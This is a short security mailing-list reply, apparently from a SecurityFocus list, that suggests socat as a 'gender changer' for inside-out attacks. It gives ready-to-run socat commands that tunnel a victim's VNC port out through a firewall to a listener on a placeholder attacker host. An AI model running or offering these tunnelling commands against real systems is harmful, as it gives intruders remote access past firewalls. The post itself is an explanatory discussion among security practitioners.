Re: TCP/IP GenderChanger

[Gerhard Rieger <gerhard.rieger () dest-unreach com>]

[sorry if double]

You might use socat from http://www.dest-unreach.org/socat/ as
"gender changer".

On your outside server host.attacker.org run it as double server:
socat tcp-l:80 tcp-l:5900
or, for multiple connections, with access restrictions, logging etc:
socat -d -d tcp-l:80,fork,range=host.victim.org/24,reuseaddr tcp-l:5900,range=localhost/32,reuseaddr

and on host.victim.org:
socat tcp:localhost:5900 tcp:host.attacker.org:80

This scenario was one of socats design goals, after I had to realize that
netcat with its derivatives and the usual port forwarders could not
easily be used for things like these.

regards
Gerhard Rieger


Ivan Buetler wrote:

> Hi there,
>
> The following article will discuss bidirectional inside-out attacks,
> inspired
> from netcat. The article discusses how to access a victims VNC server
> behind
> a firewall, where the victim initiates connectons to the attacker.
>
> http://www.csnc.ch/downloads/docs/techdocs/TCP-IP_GenderChanger_CSNC_V1.0.pdf

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/